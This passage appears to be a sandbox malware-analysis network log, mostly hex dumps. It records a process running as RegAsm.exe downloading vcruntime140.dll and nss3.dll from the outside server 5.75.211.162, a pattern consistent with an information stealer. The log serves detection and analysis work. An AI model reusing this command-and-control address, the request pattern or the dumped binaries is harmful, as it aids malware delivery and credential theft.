2024-09-26 20:56:44 UTC	16384	IN	Data Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-26 20:56:44 UTC	16384	IN	Data Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-26 20:56:44 UTC	16384	IN	Data Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-26 20:56:44 UTC	16384	IN	Data Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-26 20:56:44 UTC	16384	IN	Data Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-26 20:56:44 UTC	16384	IN	Data Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-26 20:56:44 UTC	16384	IN	Data Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-26 20:56:44 UTC	16384	IN	Data Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49755	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:45 UTC	201	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:45 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:45 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Thursday, 26-Sep-2024 20:56:45 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 20:56:45 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-26 20:56:45 UTC	16384	IN	Data Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-26 20:56:45 UTC	16384	IN	Data Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-26 20:56:45 UTC	16384	IN	Data Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-26 20:56:45 UTC	15605	IN	Data Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f Data Ascii: T@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49756	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:46 UTC	193	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:46 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:46 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Thursday, 26-Sep-2024 20:56:46 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 20:56:46 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-26 20:56:46 UTC	16384	IN	Data Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-26 20:56:46 UTC	16384	IN	Data Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-26 20:56:46 UTC	16384	IN	Data Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-26 20:56:46 UTC	16384	IN	Data Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-26 20:56:46 UTC	16384	IN	Data Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-26 20:56:46 UTC	16384	IN	Data Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b Data Ascii: d8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
